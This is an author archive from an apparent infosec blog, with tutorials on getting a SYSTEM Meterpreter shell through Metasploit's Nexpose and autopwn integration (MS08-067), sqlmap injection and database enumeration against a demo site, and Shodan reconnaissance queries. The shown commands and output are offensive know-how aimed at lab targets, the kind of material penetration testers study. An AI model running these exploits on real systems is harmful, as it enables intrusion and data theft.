Punter

Punter

(2 comments, 71 posts)

This user hasn't shared any profile information

Home page: http://punter-infosec.com/

Posts by Punter
 

Nexpose + Metasploit = Shell

5

In last post i had told u how to install Nexpose on Backtrack4RC2,today we will see how to use Nexpose through msf

Metasploit has Nexpose plugin were we can login to Nexpose scan the Target System and import the Scan Results to Metasploit,,then msf will check for the exploits Matching those vulnerabilities and it automatically run those exploits if the target system is vulnerable then get us a Interactive Shell,Lets begin

1)Run the Nexpose scanner

2)start the metasploit

root@bt:/pentest/exploits/framework3# ./msfconsole

msf > db_driver sqlite3

msf > db_create

msf > load nexpose

msf > nexpose_connect punter:[email protected]

msf > nexpose_scan -x 192.168.0.102

msf > sessions -i 1


check out the below Interactive text Snapshot

root@bt:/pentest/exploits/framework3# ./msfconsole

o                       8         o   o
8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8′ 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   ‘Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo’   8  `YooP8 `YooP’ 8YooP’ 8 `YooP’  8   8
..:..:..:…..:::..::…..::…..:8…..:..:…..::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ — –=[ 636 exploits – 319 auxiliary
+ — –=[ 215 payloads – 27 encoders – 8 nops
=[ svn r11120 updated 17 days ago (2010.11.24)

Warning: This copy of the Metasploit Framework was last updated 17 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > db_driver sqlite3
[*] Using database driver sqlite3
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-]          The database and schema will be created automatically by
[-]          db_connect. If db_connect fails to create the database, create
[-]          it manually with your DBMS’s administration tools.
[-]
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > load nexpose

____             _     _ _____   _   _     __  __
|  _ \ __ _ _ __ (_) __| |___  | | \ | | ___\ \/ /_ __   ___  ___  ___
| |_) / _` | ‘_ \| |/ _` |  / /  |  \| |/ _ \\  /| ‘_ \ / _ \/ __|/ _ \
|  _ < (_| | |_) | | (_| | / /   | |\  |  __//  \| |_) | (_) \__ \  __/
|_| \_\__,_| .__/|_|\__,_|/_/    |_| \_|\___/_/\_\ .__/ \___/|___/\___|
|_|                                   |_|

[*] NeXpose integration has been activated
[*] Successfully loaded plugin: nexpose
msf > nexpose_connect punter:[email protected]
[*] Connecting to NeXpose instance at 127.0.0.1:3780 with username punter…
msf > nexpose_scan -x 192.168.0.102
[*] Scanning 1 addresses with template pentest-audit in sets of 32
[*] Completed the scan of 1 addresses
[*] Launching an automated exploitation session
[*] Analysis completed in 26 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.0.102:445  exploit/windows/smb/ms08_067_netapi  (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos, CVE-2008-4250, CVE-2008-4250, OSVDB-49243, MSB-MS08-067, NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*]   192.168.0.102:445  exploit/windows/smb/ms06_040_netapi  (CVE-2006-3439)
[*] ================================================================================
[*]
[*]
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.0.102:445…
[*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.0.102:445…
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution…
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution…
[*] (2/2 [0 sessions]): Waiting on 1 launched modules to finish execution…
[*] Meterpreter session 1 opened (192.168.0.104:18282 -> 192.168.0.102:1067) at Sat Dec 11 03:40:01 -0500 2010
[*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution…
[*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution…
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================

Active sessions
===============

Id  Type                   Information                            Connection                                 Via
—  —-                   ———–                            ———-                                 —
1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ TESTBOX-85474D5  192.168.0.104:18282 -> 192.168.0.102:1067  exploit/windows/smb/ms08_067_netapi

[*] ================================================================================

msf > sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1040 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.0.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

C:\WINDOWS\system32>exit

 

Installing NeXpose Community Edition in BackTrack4-RC2

1

WHat is NeXpose

NeXpose is Vulnerability Scanner which Identifyies vulnerabilities across networks, operating systems, databases, Web applications and a wide-range of system platforms through an integrated, intelligent scan engine, Rapid7 NeXpose prioritizes vulnerabilities using exploit risk scoring and asset criticality ratings. As a result, NeXpose customers benefit from lower risk exposure and remediation costs.

Below are the Steps to install NeXpose in BackTrack4-RC2

1)Update the BT4
apt-get update
apt-get upgrade

2)Below are few Packages which required to run NeXpose

root@bt:~#apt-get install screen,libstdc++5,xvfb,xfonts-base,xfonts-75dpi,xserver-xorg,libxtst6,libxp6

3)now register and get the free Community Edition of NeXpose

http://www.rapid7.com/vulnerability-scanner.jsp

4)u will get a mail regarding the License and Download instructions,in that download the below file

NeXpose for Linux – 32-bit ediiton

5)once u download go to the path and execute below command

chmod +x NeXposeSetup-Linux32.bin

./NeXposeSetup-Linux32.bin -console

next follow the instructions on the Screen it takes few minutes to configure and installing the scanner

6)once evry thing is done now using firefox use the below URL and login withe the given credentials

https://localhost:3780/

7)Once u login u will be asked to enter the License once done now you are ready to scan

OWASP HTTP Post Tool(layer 7 DDOS)

1

OWASP HTTP Post Tool was created to allow you to test your web applications to test availability concerns from HTTP GET and HTTP POST denial of service attacks –

Project

http://code.google.com/p/owasp-dos-http-post/downloads/list

Also checkout the Mitigating steps from slow HTTPS DDOS from ModSecurity

http://blog.spiderlabs.com/2010/11/advanced-topic-of-the-week-mitigating-slow-http-dos-attacks.html

Using SQLMap for sql Injection

0

We have been using lot of tools for sqlinjection while Pentesting today we will see how to use SQLMap a Open source Database Fingerprinting tool which works without much of the false positives,we will test this tool on http://testphp.vulnweb.com demo site.

  1. Database Fingerprinting

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 11:52:47

[11:52:47] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[11:52:47] [INFO] resuming injection point ‘GET’ from session file
[11:52:47] [INFO] resuming injection parameter ‘cat’ from session file
[11:52:47] [INFO] resuming injection type ‘numeric’ from session file
[11:52:47] [INFO] resuming match ratio ‘0.701’ from session file
[11:52:47] [INFO] resuming 0 number of parenthesis from session file
[11:52:47] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[11:52:47] [INFO] testing connection to the target url
[11:52:48] [INFO] testing for parenthesis on injectable parameter
[11:52:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5[*] shutting down at: 11:52:48

2)Finding the Database name and current user.


./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –current-db –current-user

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 11:57:13

[11:57:13] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[11:57:13] [INFO] resuming injection point ‘GET’ from session file
[11:57:13] [INFO] resuming injection parameter ‘cat’ from session file
[11:57:13] [INFO] resuming injection type ‘numeric’ from session file
[11:57:13] [INFO] resuming match ratio ‘0.701’ from session file
[11:57:13] [INFO] resuming 0 number of parenthesis from session file
[11:57:13] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[11:57:13] [INFO] testing connection to the target url
[11:57:17] [INFO] testing for parenthesis on injectable parameter
[11:57:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[11:57:17] [INFO] fetching current user
[11:57:17] [INFO] retrieved: acuart@localhost
current user:    ‘acuart@localhost’

[11:58:45] [INFO] fetching current database
[11:58:45] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
current database:    ‘acuart’

[11:58:45] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/testphp.vulnweb.com'[*] shutting down at: 11:58:45

3) Enumerate Databases

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 12:00:57

[12:00:58] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[12:00:58] [INFO] resuming injection point ‘GET’ from session file
[12:00:58] [INFO] resuming injection parameter ‘cat’ from session file
[12:00:58] [INFO] resuming injection type ‘numeric’ from session file
[12:00:58] [INFO] resuming match ratio ‘0.701’ from session file
[12:00:58] [INFO] resuming 0 number of parenthesis from session file
[12:00:58] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[12:00:58] [INFO] testing connection to the target url
[12:00:58] [INFO] testing for parenthesis on injectable parameter
[12:00:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:00:58] [INFO] fetching database names
[12:00:58] [INFO] fetching number of databases
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': 3
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': information_schema
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': modrewriteShop
available databases [3]:[*] acuart[*] information_schema[*] modrewriteShop

[12:00:58] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/testphp.vulnweb.com'[*] shutting down at: 12:00:58
4) Enumerate Database tables and Columns

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –tables –columns

sqlmap/0.9-dev – automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 12:03:27

[12:03:27] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[12:03:27] [INFO] resuming injection point ‘GET’ from session file
[12:03:27] [INFO] resuming injection parameter ‘cat’ from session file
[12:03:27] [INFO] resuming injection type ‘numeric’ from session file
[12:03:27] [INFO] resuming match ratio ‘0.701’ from session file
[12:03:27] [INFO] resuming 0 number of parenthesis from session file
[12:03:27] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[12:03:27] [INFO] testing connection to the target url
[12:03:28] [INFO] testing for parenthesis on injectable parameter
[12:03:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:03:28] [INFO] fetching tables
[12:03:28] [INFO] fetching database names
[12:03:28] [INFO] fetching number of databases
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': 3
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': information_schema
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': modrewriteShop
[12:03:28] [INFO] fetching number of tables for database ‘information_schema’
[12:03:28] [INFO] retrieved: 16
[12:03:37] [INFO] retrieved: CHARACTER_SETS
[12:04:52] [INFO] retrieved: COLLATI

It was So easy from this tool to enumerate the details next i will be telling on using sqlmap for Advanced techniques

Watobo on BackTrack4-RC2

0

Recently BackTrack4-R2 has been released with lot of updates,but i was not able to find the Awesome tool Watobo which i have been using in lot of Web Application Security Assessment,So today we will know how to install this tool on Bt box.run the below commands from the terminal

gem install rubgems-update -v 1.3.4
gem install hoe
gem install fxruby
install the firefox extension from here

http://wiki.openqa.org/display/WTR/FireWatir+Installation

Download the latest watobo version

http://sourceforge.net/projects/watobo/

unzip watobo_0.9.5rev226.zip
cd watobo_0.9.5rev226
ruby start_watobo.rb

Done watobo is ready on BT4-RC2

BackTrack 4 R2 Released!

0

Yes, the time has come again – for a new kernel, and a new release of BackTrack. Codenamed “Nemesis”. This release is our finest release as of yet with faster Desktop responsiveness, better hardware support, broader wireless card support, streamlined work environment

BT4-rc-2 Download
http://www.backtrack-linux.org/downloads/

also check out the new Bt wiki it rocks

http://www.backtrack-linux.org/wiki/index.php/Main_Page

All lectures Videos of Ekoparty 2010

0

http://vimeo.com/16520777

Integrating Nikto with Nessus Video

1

Nice Video from Nessus on Integrating Nikto with Nessus Video

http://www.youtube.com/watch?v=6kHyAhFv7xg

International CapsLockday

0

SHODAN Computer Search Engine

1

Introduction

SHODAN is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners.

http://www.shodanhq.com/

below are the few search which help in Information Gathering using the Shodan SearchEngine.

“debian” ssh port:22

“Joomla” http port:80

“microsoft” telnet port:23

apache country:in port:80 hostname:.com

server country:in port:80 hostname:.com

debian country:in port:80 hostname:.com

server country:in port:21 hostname:.com

“Joomla” http port:80 hostname:.com

IIS port:80 hostname:.com

IIS 5 port:80 hostname:.com

IIS 6 port:80 hostname:.com

IIS 4 port:80 hostname:.com

tomcat port:80 hostname:.com

phpmyadmin port:80 hostname:.com

“gigaset” server port:80

server port:21

“mysql” server port:80 hostname:.com

“sqlserver” server port:1433

“sql” server port:1433

Punter's RSS Feed
Go to Top